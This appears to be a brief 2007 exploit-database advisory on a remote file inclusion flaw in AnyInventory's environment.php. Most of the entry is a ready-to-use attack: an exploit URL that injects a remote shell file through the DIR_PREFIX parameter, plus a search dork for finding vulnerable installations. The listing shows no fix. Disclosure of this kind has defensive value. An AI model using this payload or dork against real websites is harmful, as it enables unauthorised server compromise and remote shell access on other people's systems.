AnyInventory <= 2.0 (environment.php) Remote File Inclusion Vuln

2007-09-05 00:00:00

#AnyInventory => 2.0 Remote file inclusion

#Download script : http://physics.ramapo.edu/downloads/anyInventory-1.9.1.tar.gz

#Exploit :

#http://victime.com/[anyInventory_path]/environment.php?DIR_PREFIX= shell.txt?

#Dork : anyInventory, the most flexible and powerful web-based inventory system

#Discovered by ThE TiGeR

#Miro_Tiger100[at]Hotmail.com

#

Fixes

No fixes

In order to submit a new fix you need to be registered.